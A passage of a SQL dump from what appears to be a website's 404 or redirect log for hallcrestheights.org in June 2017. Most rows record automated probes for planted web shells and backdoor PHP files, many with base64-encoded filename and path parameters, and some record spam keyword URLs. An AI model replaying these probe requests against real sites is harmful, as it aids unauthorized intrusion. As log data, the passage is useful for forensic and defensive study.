00:00:00'),(10685,'http://hallcrestheights.org/media/1ndex.php?z3=WWFEWGUxLnBocA==&z4=L21lZGlhLw==',NULL,'hallcrestheights.org','',2,0,'2017-06-07 04:20:38','0000-00-00 00:00:00'),(10686,'http://hallcrestheights.org/media/tmp.php?z3=WWFEWGUxLnBocA==&z4=L21lZGlhLw==',NULL,'hallcrestheights.org','',2,0,'2017-06-07 04:19:19','0000-00-00 00:00:00'),(10687,'http://hallcrestheights.org/wp-content/plugins/SocketIontrol.php?z3=WWFEWGUxLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-06-07 04:20:42','0000-00-00 00:00:00'),(10688,'http://hallcrestheights.org/google-assist.php?z3=WWFEWGUxLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-06-07 04:20:43','0000-00-00 00:00:00'),(10689,'http://hallcrestheights.org/cache/defau1t.php?z3=WWFEWGUxLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',1,0,'2017-06-07 04:21:09','0000-00-00 00:00:00'),(10690,'http://hallcrestheights.org/roubt.php?z3=WWFEWGUxLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-06-07 04:22:30','0000-00-00 00:00:00'),(10691,'http://hallcrestheights.org/bookmark.php?z3=WWFEWGUxLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-06-07 04:22:31','0000-00-00 00:00:00'),(10692,'http://hallcrestheights.org/wp-content/plugins/SocketIasrgasfontrol.php?z3=WWFEWGUxLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-06-07 04:26:47','0000-00-00 00:00:00'),(10693,'http://hallcrestheights.org/wp-content/plugins/wpfootes.php?z3=WWFEWGUxLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-06-07 04:25:28','0000-00-00 00:00:00'),(10694,'http://hallcrestheights.org/A.php?z3=WWFEWGUxLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-06-07 04:25:53','0000-00-00 00:00:00'),(10695,'http://hallcrestheights.org/modules/modules/modules.php?z3=WWFEWGUxLnBocA==&z4=L21vZHVsZXMvbW9kdWxlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-06-07 04:27:13','0000-00-00 00:00:00'),(10696,'http://hallcrestheights.org/wp-content/themes/fossy-speurhondenworst/divi-children-engine/divi_children_engine.php?z3=WWFEWGUxLnBocA==&z4=L3dwLWNvbnRlbnQvdGhlbWVzL2Zvc3N5LXNwZXVyaG9uZGVud29yc3QvZGl2aS1jaGlsZHJlbi1lbmdpbmUv',NULL,'hallcrestheights.org','',2,0,'2017-06-07 04:25:54','0000-00-00 00:00:00'),(10697,'http://hallcrestheights.org/wp-content/themes/margreetalgra/404.php?z3=WWFEWGUxLnBocA==&z4=L3dwLWNvbnRlbnQvdGhlbWVzL21hcmdyZWV0YWxncmEv',NULL,'hallcrestheights.org','',2,0,'2017-06-07 04:25:55','0000-00-00 00:00:00'),(10698,'http://hallcrestheights.org/wp-content/themes/twentyeleven-child/footer.php?z3=WWFEWGUxLnBocA==&z4=L3dwLWNvbnRlbnQvdGhlbWVzL3R3ZW50eWVsZXZlbi1jaGlsZC8=',NULL,'hallcrestheights.org','',2,0,'2017-06-07 04:25:57','0000-00-00 00:00:00'),(10699,'http://hallcrestheights.org/sqlbak.php?z3=WWFEWGUxLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-06-07 04:26:18','0000-00-00 00:00:00'),(10700,'http://hallcrestheights.org/email.php?z3=WWFEWGUxLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-06-07 04:27:59','0000-00-00 00:00:00'),(10701,'http://hallcrestheights.org/images/stories/0day.php?z3=WWFEWGUxLnBocA==&z4=L2ltYWdlcy9zdG9yaWVzLw==',NULL,'hallcrestheights.org','',2,0,'2017-06-07 04:27:59','0000-00-00 00:00:00'),(10702,'http://hallcrestheights.org/install.php?z3=WWFEWGUxLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-06-07 04:28:05','0000-00-00 00:00:00'),(10703,'http://hallcrestheights.org/error-log.php?z3=WWFEWGUxLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-06-07 04:27:49','0000-00-00 00:00:00'),(10704,'http://hallcrestheights.org/xmlsrpc.php?z3=WWFEWGUxLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-06-07 04:29:11','0000-00-00 00:00:00'),(10705,'http://hallcrestheights.org/wp-content/plugins/Analyser.php?z3=WWFEWGUxLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-06-07 04:29:12','0000-00-00 00:00:00'),(10706,'http://hallcrestheights.org/shootmei.php?z3=WWFEWGUxLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-06-07 04:29:13','0000-00-00 00:00:00'),(10707,'http://hallcrestheights.org/Abbrevsprl.php?z3=WWFEWGUxLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-06-07 04:31:16','0000-00-00 00:00:00'),(10708,'http://hallcrestheights.org/M-J!r4ya-F4r3s.php?z3=WWFEWGUxLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-06-07 04:31:40','0000-00-00 00:00:00'),(10709,'http://hallcrestheights.org/show.php?z3=WWFEWGUxLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-06-07 04:35:12','0000-00-00 00:00:00'),(10710,'http://hallcrestheights.org/cache/news.php?z3=WWFEWGUxLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-06-07 04:36:34','0000-00-00 00:00:00'),(10711,'http://hallcrestheights.org/images/head.php?z3=WWFEWGUxLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-06-07 04:36:36','0000-00-00 00:00:00'),(10712,'http://hallcrestheights.org/wp-content/plugins/wp-lg3.php?z3=WWFEWGUxLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-06-07 04:36:37','0000-00-00 00:00:00'),(10713,'http://hallcrestheights.org/wp-content/plugins/wp-lg2.php?z3=WWFEWGUxLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-06-07 04:36:38','0000-00-00 00:00:00'),(10714,'http://hallcrestheights.org/wp-content/plugins/caches.php?z3=WWFEWGUxLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-06-07 04:37:57','0000-00-00 00:00:00'),(10715,'http://hallcrestheights.org/modules/mod_simplefileuploadv1.3/elements/YaDXe1.php',NULL,'','',1,0,'2017-06-07 04:38:40','0000-00-00 00:00:00'),(10716,'http://hallcrestheights.org/wp-content/plugins/revslider/temp/update_extract/YaDXe1.php',NULL,'','',1,0,'2017-06-07 04:38:41','0000-00-00 00:00:00'),(10717,'http://hallcrestheights.org/wp-content/uploads/YaDXe1.php',NULL,'','',1,0,'2017-06-07 04:38:43','0000-00-00 00:00:00'),(10718,'http://hallcrestheights.org/YaDXe1.php',NULL,'','',1,0,'2017-06-07 04:38:44','0000-00-00 00:00:00'),(10719,'http://hallcrestheights.org/sites/all/libraries/elfinder/files/YaDXe1.php',NULL,'','',1,0,'2017-06-07 04:38:45','0000-00-00 00:00:00'),(10720,'http://hallcrestheights.org/cache/wcache7675n.PHP?z3=WWFEWGUxLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',1,0,'2017-06-07 04:39:09','0000-00-00 00:00:00'),(10721,'http://hallcrestheights.org/log.php?z3=WWFEWGUxLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-06-07 04:41:51','0000-00-00 00:00:00'),(10722,'http://hallcrestheights.org/includes/u2p.php?z3=WWFEWGUxLnBocA==&z4=L2luY2x1ZGVzLw==',NULL,'hallcrestheights.org','',2,0,'2017-06-07 04:41:52','0000-00-00 00:00:00'),(10723,'http://hallcrestheights.org/cache/cache_aqbmkwwx.php?z3=WWFEWGUxLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-06-07 04:41:53','0000-00-00 00:00:00'),(10724,'http://hallcrestheights.org/dswat.org/wsdl.php?z3=WWFEWGUxLnBocA==&z4=L2Rzd2F0Lm9yZy8=',NULL,'hallcrestheights.org','',2,0,'2017-06-07 04:41:55','0000-00-00 00:00:00'),(10725,'http://hallcrestheights.org/site/tmp/cTivrC.php?z3=WWFEWGUxLnBocA==&z4=L3NpdGUvdG1wLw==',NULL,'hallcrestheights.org','',2,0,'2017-06-07 04:41:56','0000-00-00 00:00:00'),(10726,'http://hallcrestheights.org/wp-main.php?z3=WWFEWGUxLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-06-07 04:41:58','0000-00-00 00:00:00'),(10727,'http://hallcrestheights.org/images/robots.txt.php?z3=WWFEWGUxLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-06-07 04:41:59','0000-00-00 00:00:00'),(10728,'http://hallcrestheights.org/cli/40dd1d.php?z3=WWFEWGUxLnBocA==&z4=L2NsaS8=',NULL,'hallcrestheights.org','',2,0,'2017-06-07 04:42:01','0000-00-00 00:00:00'),(10729,'http://www.hallcrestheights.org/sitemap/index.html',NULL,'https://www.google.co.jp/','',2,0,'2017-06-07 07:41:43','0000-00-00 00:00:00'),(10730,'http://hallcrestheights.org/templates/pjo_zonada_free/includes/advanced_settings.php',NULL,'http://hallcrestheights.org/templates/pjo_zonada_free/includes/advanced_settings.php','',1,0,'2017-06-07 17:09:44','0000-00-00 00:00:00'),(10731,'http://hallcrestheights.org/language/el-gr/advanced_settings.php',NULL,'http://hallcrestheights.org/language/el-gr/advanced_settings.php','',1,0,'2017-06-07 17:14:05','0000-00-00 00:00:00'),(10732,'http://hallcrestheights.org/plugins/content/finder/config.php',NULL,'http://hallcrestheights.org/plugins/content/finder/config.php','',1,0,'2017-06-07 17:16:43','0000-00-00 00:00:00'),(10733,'http://hallcrestheights.org/images/db.php',NULL,'http://hallcrestheights.org/images/db.php','',1,0,'2017-06-07 18:21:05','0000-00-00 00:00:00'),(10734,'http://hallcrestheights.org/templates/pjo_zonada_free/js/advanced_settings.php',NULL,'http://hallcrestheights.org/templates/pjo_zonada_free/js/advanced_settings.php','',1,0,'2017-06-07 19:15:48','0000-00-00 00:00:00'),(10735,'http://hallcrestheights.org/images/articles/advanced_settings.php',NULL,'http://hallcrestheights.org/images/articles/advanced_settings.php','',1,0,'2017-06-07 19:19:08','0000-00-00 00:00:00'),(10736,'http://hallcrestheights.org/plugins/attachments/attachments_for_content/advanced_settings.php',NULL,'http://hallcrestheights.org/plugins/attachments/attachments_for_content/advanced_settings.php','',1,0,'2017-06-07 20:24:00','0000-00-00 00:00:00'),(10737,'http://hallcrestheights.org/templates/pjo_zonada_free/elements/advanced_settings.php',NULL,'http://hallcrestheights.org/templates/pjo_zonada_free/elements/advanced_settings.php','',1,0,'2017-06-07 20:26:02','0000-00-00 00:00:00'),(10738,'http://hallcrestheights.org/components/com_jce/views/popup/path/lndex.php',NULL,'http://hallcrestheights.org/components/com_jce/views/popup/path/lndex.php','',1,0,'2017-06-07 20:27:40','0000-00-00 00:00:00'),(10739,'http://hallcrestheights.org/cache/advanced_settings.php',NULL,'http://hallcrestheights.org/cache/advanced_settings.php','',1,0,'2017-06-07 20:32:31','0000-00-00 00:00:00'),(10740,'http://hallcrestheights.org/templates/pjo_zonada_free/css/colors/advanced_settings.php',NULL,'http://hallcrestheights.org/templates/pjo_zonada_free/css/colors/advanced_settings.php','',1,0,'2017-06-07 21:30:16','0000-00-00 00:00:00'),(10741,'http://hallcrestheights.org/templates/pjo_zonada_free/images/backgrounds/advanced_settings.php',NULL,'http://hallcrestheights.org/templates/pjo_zonada_free/images/backgrounds/advanced_settings.php','',1,0,'2017-06-07 21:32:25','0000-00-00 00:00:00'),(10742,'http://hallcrestheights.org/components/com_attachments/controllers/advanced_settings.php',NULL,'http://hallcrestheights.org/components/com_attachments/controllers/advanced_settings.php','',1,0,'2017-06-07 21:34:50','0000-00-00 00:00:00'),(10743,'http://hallcrestheights.org/components/com_jce/help.php',NULL,'http://hallcrestheights.org/components/com_jce/help.php','',1,0,'2017-06-07 21:36:24','0000-00-00 00:00:00'),(10744,'http://hallcrestheights.org/templates/pjo_zonada_free/fonts/advanced_settings.php',NULL,'http://hallcrestheights.org/templates/pjo_zonada_free/fonts/advanced_settings.php','',1,0,'2017-06-07 22:34:27','0000-00-00 00:00:00'),(10745,'http://hallcrestheights.org/libraries/cms/captcha/advanced_settings.php',NULL,'http://hallcrestheights.org/libraries/cms/captcha/advanced_settings.php','',1,0,'2017-06-07 22:47:39','0000-00-00 00:00:00'),(10746,'http://hallcrestheights.org/defined.php',NULL,'http://hallcrestheights.org/defined.php','',3,0,'2017-06-07 23:40:53','0000-00-00 00:00:00'),(10747,'http://hallcrestheights.org/modules/mod_mapsgoogle/cache.php',NULL,'http://hallcrestheights.org/modules/mod_mapsgoogle/cache.php','',1,0,'2017-06-08 00:36:06','0000-00-00 00:00:00'),(10748,'http://hallcrestheights.org/modules/mod_articlemanage/mod_articlemanage.php',NULL,'http://hallcrestheights.org/modules/mod_articlemanage/mod_articlemanage.php','',1,0,'2017-06-08 04:36:12','0000-00-00 00:00:00'),(10749,'http://www.hallcrestheights.org/kzpff-k43757-msxklr-i20162634-dedhw-gefv/',NULL,'http://www.google.co.jp/','',5,0,'2017-06-08 05:04:20','0000-00-00 00:00:00'),(10750,'http://hallcrestheights.org/templates/pjo_zonada_free/html/com_content/archive/advanced_settings.php',NULL,'http://hallcrestheights.org/templates/pjo_zonada_free/html/com_content/archive/advanced_settings.php','',1,0,'2017-06-08 05:45:52','0000-00-00 00:00:00'),(10751,'http://hallcrestheights.org/modules/mod_sape/mod_sape.php',NULL,'http://hallcrestheights.org/modules/mod_sape/mod_sape.php','',1,0,'2017-06-08 05:48:42','0000-00-00 00:00:00'),(10752,'http://hallcrestheights.org/modules/mod_articles_archive/tmpl/advanced_settings.php',NULL,'http://hallcrestheights.org/modules/mod_articles_archive/tmpl/advanced_settings.php','',2,0,'2017-06-08 07:24:17','0000-00-00 00:00:00'),(10753,'http://hallcrestheights.org/images/css-class.php',NULL,'http://hallcrestheights.org/images/css-class.php','',1,0,'2017-06-08 08:25:33','0000-00-00 00:00:00'),(10754,'http://hallcrestheights.org/templates/beez/404.php',NULL,'http://hallcrestheights.org/templates/beez/404.php','',1,0,'2017-06-08 08:26:06','0000-00-00 00:00:00'),(10755,'http://hallcrestheights.org/templates/beez/shwso.php',NULL,'http://hallcrestheights.org/templates/beez/shwso.php','',1,0,'2017-06-08 09:44:37','0000-00-00 00:00:00'),(10756,'http://hallcrestheights.org/joomla/administrator/components/com_extplorer/config/.htusers.php',NULL,'http://hallcrestheights.org/joomla/administrator/components/com_extplorer/config/.htusers.php','',1,0,'2017-06-09 05:56:11','0000-00-00 00:00:00'),(10757,'http://hallcrestheights.org/tmp/wp-ajax.php',NULL,'http://hallcrestheights.org/tmp/wp-ajax.php','',1,0,'2017-06-09 07:00:09','0000-00-00 00:00:00'),(10758,'http://hallcrestheights.org/plugins/user/profile/profiles/mail.php',NULL,'http://hallcrestheights.org/plugins/user/profile/profiles/mail.php','',1,0,'2017-06-09 07:06:51','0000-00-00 00:00:00'),(10759,'http://hallcrestheights.org/images/404.php',NULL,'http://hallcrestheights.org/images/404.php','',43,0,'2017-06-09 08:05:19','0000-00-00 00:00:00'),(10760,'http://hallcrestheights.org/components/com_weblinks/models/gallery.php',NULL,'http://hallcrestheights.org/components/com_weblinks/models/gallery.php','',1,0,'2017-06-09 08:15:40','0000-00-00 00:00:00'),(10761,'http://hallcrestheights.org/templates/patrachess/bootstrap/css/advanced_settings.php',NULL,'http://hallcrestheights.org/templates/patrachess/bootstrap/css/advanced_settings.php','',1,0,'2017-06-09 08:24:34','0000-00-00 00:00:00'),(10762,'http://hallcrestheights.org/includes/advanced_settings.php',NULL,'http://hallcrestheights.org/includes/advanced_settings.php','',1,0,'2017-06-09 08:25:37','0000-00-00 00:00:00'),(10763,'http://hallcrestheights.org/modules/mod_msn/mainin.php',NULL,'http://hallcrestheights.org/modules/mod_msn/mainin.php','',1,0,'2017-06-09 10:15:53','0000-00-00 00:00:00'),(10764,'http://hallcrestheights.org/libraries/pma_insert_edit_test.php',NULL,'http://hallcrestheights.org/libraries/pma_insert_edit_test.php','',1,0,'2017-06-09 11:24:27','0000-00-00 00:00:00'),(10765,'http://hallcrestheights.org/media/editors/tinymce/jscripts/tiny_mce/themes/advanced/js/cache.php',NULL,'http://hallcrestheights.org/media/editors/tinymce/jscripts/tiny_mce/themes/advanced/js/cache.php','',1,0,'2017-06-09 11:34:50','0000-00-00 00:00:00'),(10766,'http://www.hallcrestheights.org/wbwpbon-kydhx-jjikvf-vtzpxb-i20162636-xkcwj-k10773-ybty-lwosdu-ieqgws/',NULL,'','',1,0,'2017-06-09 16:49:31','0000-00-00 00:00:00'),(10767,'http://hallcrestheights.org/xmlsrpc.php?z3=YVhFWWRiLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-06-09 23:35:23','0000-00-00 00:00:00'),(10768,'http://hallcrestheights.org/wp-content/plugins/Analyser.php?z3=YVhFWWRiLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-06-09 23:35:28','0000-00-00 00:00:00'),(10769,'http://hallcrestheights.org/media/404.php?z3=YVhFWWRiLnBocA==&z4=L21lZGlhLw==',NULL,'hallcrestheights.org','',1,0,'2017-06-09 23:36:59','0000-00-00 00:00:00'),(10770,'http://hallcrestheights.org/images/head.php?z3=YVhFWWRiLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-06-09 23:37:02','0000-00-00 00:00:00'),(10771,'http://www.hallcrestheights.org/k19240-fadlajfn-lgfpc-vwgmyhde-i20162628-cwxbdeu-dkov.htm',NULL,'http://search.yahoo.co.jp/','',2,0,'2017-06-10 07:12:12','0000-00-00 00:00:00'),(10772,'http://www.hallcrestheights.org/ixnmuea-hwhiozhj-k62528-xbnwpgey-ooayiku-i20162632-ksszqc-ebaqd.htm',NULL,'https://www.google.co.jp/','',6,0,'2017-06-11 03:43:57','0000-00-00 00:00:00'),(10773,'http://hallcrestheights.org//modules/mod_simplefileuploadv1.3/elements/spy.php',NULL,'','',3,0,'2017-06-11 06:47:28','0000-00-00 00:00:00'),(10774,'http://www.hallcrestheights.org/pcscqruf-k35680-unpkw-xpoideot-wtvsoar-mosm-gepla-i20162631-lheliy.htm',NULL,'','',3,0,'2017-06-11 10:53:35','0000-00-00 00:00:00'),(10775,'http://hallcrestheights.org/components/com_weblinks/controllers/node.php',NULL,'http://hallcrestheights.org/components/com_weblinks/controllers/node.php','',1,0,'2017-06-11 16:27:02','0000-00-00 00:00:00'),(10776,'http://hallcrestheights.org/libraries/f0f/database/driver/backup.php',NULL,'http://hallcrestheights.org/libraries/f0f/database/driver/backup.php','',1,0,'2017-06-11 17:32:06','0000-00-00 00:00:00'),(10777,'http://hallcrestheights.org/components/com_ajax/pagenews.php',NULL,'http://hallcrestheights.org/components/com_ajax/pagenews.php','',1,0,'2017-06-11 17:32:18','0000-00-00 00:00:00'),(10778,'http://hallcrestheights.org/components/com_finder/views/search/backup.php',NULL,'http://hallcrestheights.org/components/com_finder/views/search/backup.php','',1,0,'2017-06-11 18:38:36','0000-00-00 00:00:00'),(10779,'http://hallcrestheights.org/components/com_roksprocket/fields/tags/css/update.php',NULL,'http://hallcrestheights.org/components/com_roksprocket/fields/tags/css/update.php','',1,0,'2017-06-11 18:40:01','0000-00-00 00:00:00'),(10780,'http://hallcrestheights.org/templates/beez/e8c5.php',NULL,'http://hallcrestheights.org/templates/beez/e8c5.php','',1,0,'2017-06-11 19:57:09','0000-00-00 00:00:00'),(10781,'http://hallcrestheights.org/modules/mod_newsflash/media-views-rtl.php',NULL,'http://hallcrestheights.org/modules/mod_newsflash/media-views-rtl.php','',1,0,'2017-06-11 22:04:01','0000-00-00 00:00:00'),(10782,'http://hallcrestheights.org/libraries/f0f/utils/filescheck/backup.php',NULL,'http://hallcrestheights.org/libraries/f0f/utils/filescheck/backup.php','',1,0,'2017-06-11 22:06:29','0000-00-00 00:00:00'),(10783,'http://hallcrestheights.org/components/com_mailto/helpers/contact.php',NULL,'http://hallcrestheights.org/components/com_mailto/helpers/contact.php','',1,0,'2017-06-11 22:47:21','0000-00-00 00:00:00'),(10784,'http://hallcrestheights.org/libraries/vendor/symfony/polyfill-php55/backup.php',NULL,'http://hallcrestheights.org/libraries/vendor/symfony/polyfill-php55/backup.php','',1,0,'2017-06-11 22:49:23','0000-00-00 00:00:00'),(10785,'http://hallcrestheights.org/layouts/plugins/ob_list_handlers.php',NULL,'http://hallcrestheights.org/layouts/plugins/ob_list_handlers.php','',1,0,'2017-06-12 00:47:42','0000-00-00 00:00:00'),(10786,'http://hallcrestheights.org/modules/mod_articless/simple.php',NULL,'http://hallcrestheights.org/modules/mod_articless/simple.php','',1,0,'2017-06-12 00:53:21','0000-00-00 00:00:00'),(10787,'http://hallcrestheights.org/modules/mod_djimageslider/mod_djimageslider.php',NULL,'http://hallcrestheights.org/modules/mod_djimageslider/mod_djimageslider.php','',1,0,'2017-06-12 01:55:32','0000-00-00 00:00:00'),(10788,'http://hallcrestheights.org/components/com_jcomments/plugins/setup.php',NULL,'http://hallcrestheights.org/components/com_jcomments/plugins/setup.php','',2,0,'2017-06-12 02:50:05','0000-00-00 00:00:00'),(10789,'http://hallcrestheights.org/plugins/captcha/jproicaptcha.php',NULL,'http://hallcrestheights.org/plugins/captcha/jproicaptcha.php','',2,0,'2017-06-12 02:52:48','0000-00-00 00:00:00'),(10790,'http://hallcrestheights.org/templates/rhuk_milkyway/simple.php',NULL,'http://hallcrestheights.org/templates/rhuk_milkyway/simple.php','',1,0,'2017-06-12 02:55:31','0000-00-00 00:00:00'),(10791,'http://hallcrestheights.org/plugins/captcha/jproicaptcha/jproicaptcha.php',NULL,'http://hallcrestheights.org/plugins/captcha/jproicaptcha/jproicaptcha.php','',3,0,'2017-06-12 03:51:41','0000-00-00 00:00:00'),(10792,'http://hallcrestheights.org/includes/view.php',NULL,'http://hallcrestheights.org/includes/view.php','',1,0,'2017-06-12 04:00:48','0000-00-00 00:00:00'),(10793,'http://hallcrestheights.org/images/newshell.php',NULL,'http://hallcrestheights.org/images/newshell.php','',1,0,'2017-06-12 04:07:47','0000-00-00 00:00:00'),(10794,'http://hallcrestheights.org/components/com_content/jjanab.php',NULL,'http://hallcrestheights.org/components/com_content/jjanab.php','',1,0,'2017-06-12 04:57:07','0000-00-00 00:00:00'),(10795,'http://hallcrestheights.org/components/com_weblinks/date_time_set.php',NULL,'http://hallcrestheights.org/components/com_weblinks/date_time_set.php','',1,0,'2017-06-12 05:57:55','0000-00-00 00:00:00'),(10796,'http://hallcrestheights.org/library/zend/xmlrpc/response/array_intersect.php',NULL,'http://hallcrestheights.org/library/zend/xmlrpc/response/array_intersect.php','',1,0,'2017-06-12 05:56:47','0000-00-00 00:00:00'),(10797,'http://hallcrestheights.org/components/com_weblinks/models/madleet.php',NULL,'http://hallcrestheights.org/components/com_weblinks/models/madleet.php','',1,0,'2017-06-12 06:03:25','0000-00-00 00:00:00'),(10798,'http://hallcrestheights.org/modules/mod_gcalendar_upcoming/language/et-ee/backup.php',NULL,'http://hallcrestheights.org/modules/mod_gcalendar_upcoming/language/et-ee/backup.php','',1,0,'2017-06-12 07:42:39','0000-00-00 00:00:00'),(10799,'http://hallcrestheights.org/modules/mod_system.php',NULL,'http://hallcrestheights.org/modules/mod_system.php','',6,0,'2017-06-12 08:33:59','0000-00-00 00:00:00'),(10800,'http://hallcrestheights.org/modules/mod_systema/mod_system.php',NULL,'http://hallcrestheights.org/modules/mod_systema/mod_system.php','',1,0,'2017-06-12 11:28:26','0000-00-00 00:00:00'),(10801,'http://www.hallcrestheights.org/k8864-ixnmu-i20162633-eahw-hioz-hjxbnwpg.htm',NULL,'https://search.yahoo.co.jp/','',6,0,'2017-06-12 14:10:33','0000-00-00 00:00:00'),(10802,'http://www.hallcrestheights.org/gnfzn-xvjx-i20162632-palt-itjshkyj-k59064-yldpijaa-mdurta-enpgg-wtdvlx-tdqku-nfglqrh.htm',NULL,'https://search.yahoo.co.jp/','',2,0,'2017-06-13 05:17:21','0000-00-00 00:00:00'),(10803,'http://hallcrestheights.org/wp-content/plugins/wp-easy-gallery-pro/admin/php.php',NULL,'http://hallcrestheights.org/wp-content/plugins/wp-easy-gallery-pro/admin/php.php','',1,0,'2017-06-13 18:39:49','0000-00-00 00:00:00'),(10804,'http://hallcrestheights.org/components/com_users/views/profile/tmpl/config.php',NULL,'http://hallcrestheights.org/components/com_users/views/profile/tmpl/config.php','',1,0,'2017-06-14 13:08:28','0000-00-00 00:00:00'),(10805,'http://hallcrestheights.org/components/com_jce/editor/extensions/popups/config.php',NULL,'http://hallcrestheights.org/components/com_jce/editor/extensions/popups/config.php','',1,0,'2017-06-14 14:21:03','0000-00-00 00:00:00'),(10806,'http://www.hallcrestheights.org/edzvdlqc-omnnm-mcawvbfu-japyvrl-i20162628-k18540-flxh-qjkuh-kcmumb-hmgz.htm',NULL,'http://search.yahoo.co.jp/','',4,0,'2017-06-14 15:20:55','0000-00-00 00:00:00'),(10807,'http://hallcrestheights.org/components/com_config/view/templates/tmpl/config.php',NULL,'http://hallcrestheights.org/components/com_config/view/templates/tmpl/config.php','',1,0,'2017-06-14 20:55:06','0000-00-00 00:00:00'),(10808,'http://hallcrestheights.org/components/com_mailto/views/mailto/tmpl/config.php',NULL,'http://hallcrestheights.org/components/com_mailto/views/mailto/tmpl/config.php','',1,0,'2017-06-14 22:11:45','0000-00-00 00:00:00'),(10809,'http://hallcrestheights.org/libraries/joomla/github/package/orgs/config.php',NULL,'http://hallcrestheights.org/libraries/joomla/github/package/orgs/config.php','',1,0,'2017-06-14 23:29:34','0000-00-00 00:00:00'),(10810,'http://hallcrestheights.org/media/editors/tinymce/plugins/advlist/config.php',NULL,'http://hallcrestheights.org/media/editors/tinymce/plugins/advlist/config.php','',1,0,'2017-06-15 02:51:20','0000-00-00 00:00:00'),(10811,'http://hallcrestheights.org/models.php',NULL,'http://hallcrestheights.org/models.php','',3,0,'2017-06-15 02:52:22','0000-00-00 00:00:00'),(10812,'http://hallcrestheights.org/images/gallery.php',NULL,'http://hallcrestheights.org/images/gallery.php','',1,0,'2017-06-15 04:27:32','0000-00-00 00:00:00'),(10813,'http://hallcrestheights.org/images/banners/advanced_settings.php',NULL,'http://hallcrestheights.org/images/banners/advanced_settings.php','',1,0,'2017-06-15 05:22:08','0000-00-00 00:00:00'),(10814,'http://hallcrestheights.org/tmp/advanced_settings.php',NULL,'http://hallcrestheights.org/tmp/advanced_settings.php','',1,0,'2017-06-15 07:50:51','0000-00-00 00:00:00'),(10815,'http://hallcrestheights.org/images/headers/smile.php',NULL,'http://hallcrestheights.org/images/headers/smile.php','',4,0,'2017-06-15 16:54:35','0000-00-00 00:00:00'),(10816,'http://hallcrestheights.org/language/en-gb/advanced_settings.php',NULL,'http://hallcrestheights.org/language/en-gb/advanced_settings.php','',1,0,'2017-06-15 17:01:17','0000-00-00 00:00:00'),(10817,'http://hallcrestheights.org/footer.php',NULL,'http://hallcrestheights.org/footer.php','',2,0,'2017-06-15 20:19:08','0000-00-00 00:00:00'),(10818,'http://hallcrestheights.org/media/editors/tinymce/plugins/layer/config.php',NULL,'http://hallcrestheights.org/media/editors/tinymce/plugins/layer/config.php','',1,0,'2017-06-15 21:26:19','0000-00-00 00:00:00'),(10819,'http://hallcrestheights.org/plugins/system/languagecode/language/en-gb/backup.php',NULL,'http://hallcrestheights.org/plugins/system/languagecode/language/en-gb/backup.php','',2,0,'2017-06-16 00:49:44','0000-00-00 00:00:00'),(10820,'http://hallcrestheights.org/media/editors/codemirror/mode/mirc/config.php',NULL,'http://hallcrestheights.org/media/editors/codemirror/mode/mirc/config.php','',1,0,'2017-06-16 01:57:51','0000-00-00 00:00:00'),(10821,'http://hallcrestheights.org/media/editors/tinymce/plugins/anchor/config.php',NULL,'http://hallcrestheights.org/media/editors/tinymce/plugins/anchor/config.php','',1,0,'2017-06-16 05:25:00','0000-00-00 00:00:00'),(10822,'http://hallcrestheights.org/cache/widgetkit/twitter/ftp_pwd.php',NULL,'http://hallcrestheights.org/cache/widgetkit/twitter/ftp_pwd.php','',1,0,'2017-06-16 09:01:56','0000-00-00 00:00:00'),(10823,'http://www.hallcrestheights.org/qlbowcig-i20162633-k7541-gece-ayafxrg-lnikghhm/',NULL,'http://search.yahoo.co.jp/','',7,0,'2017-06-16 14:26:25','0000-00-00 00:00:00'),(10824,'http://hallcrestheights.org/media/editors/tinymce/plugins/fullpage/config.php',NULL,'http://hallcrestheights.org/media/editors/tinymce/plugins/fullpage/config.php','',1,0,'2017-06-16 14:28:14','0000-00-00 00:00:00'),(10825,'http://hallcrestheights.org/media/editors/codemirror/mode/tiddlywiki/config.php',NULL,'http://hallcrestheights.org/media/editors/codemirror/mode/tiddlywiki/config.php','',1,0,'2017-06-16 17:46:18','0000-00-00 